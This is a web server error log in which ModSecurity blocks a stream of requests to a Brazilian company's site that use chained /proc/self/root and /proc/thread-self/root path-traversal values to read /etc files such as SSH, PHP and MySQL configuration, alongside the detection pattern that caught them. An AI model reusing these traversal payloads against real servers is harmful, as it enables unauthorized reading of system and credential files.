[Thu Mar 19 04:53:19.640650 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:60210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburb_u8EFLIOrSqIptuGgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:19.806795 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.241.31:32916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburb1_V7PWP6ixUYl6MAgAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:20.975458 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:49864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburcAbLMZ6AikZjR9UtRwAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:25.887234 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:49870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburdeyqAr6etmhZHNozqQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:28.559788 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:49874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburd_u8EFLIOrSqIptuIgAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:31.444078 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.241.31:32932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburev-YZRR_7pZ7nDJdbAAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:53:38.243886 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:54538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburgta6ubjKNq_cu4YR2gAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:53:39.554953 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:45678] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburgwbLMZ6AikZjR9UtUAAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:53:41.943326 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:45692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburhQbLMZ6AikZjR9UtUgAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:53:57.977832 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.243.128:55650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburlQkwaGbbGflqUZCFNwAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:54:06.892248 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:60298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburngkwaGbbGflqUZCFRwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:54:08.427051 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 74.7.243.128:60308] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 04:54:12.837701 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:60316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburpPu8EFLIOrSqIptuRQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:54:26.451594 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:54256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abursvu8EFLIOrSqIptuWAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:54:28.915676 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:57102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburtNa6ubjKNq_cu4YSBwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:54:30.415625 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:57298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburtta6ubjKNq_cu4YSCAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:54:37.366520 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.228.61:56104] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aburvRkFeYa1D6dYQnC-dgAAAck"]
[Thu Mar 19 04:54:55.576557 2026] [:error] [pid 27293:tid 140411658000128] [client 74.7.243.128:57314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aburz_-YZRR_7pZ7nDJdqgAAA8o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:54:56.933650 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:36010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur0Pu8EFLIOrSqIptuawAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:54:57.310914 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.68:54272] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 04:54:59.091388 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:36016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur0gbLMZ6AikZjR9UtgwAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:00.557283 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:53878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur1AkwaGbbGflqUZCFbQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:55:10.741449 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:53880] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abur3sdf6f5d65gmYZRDtgAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
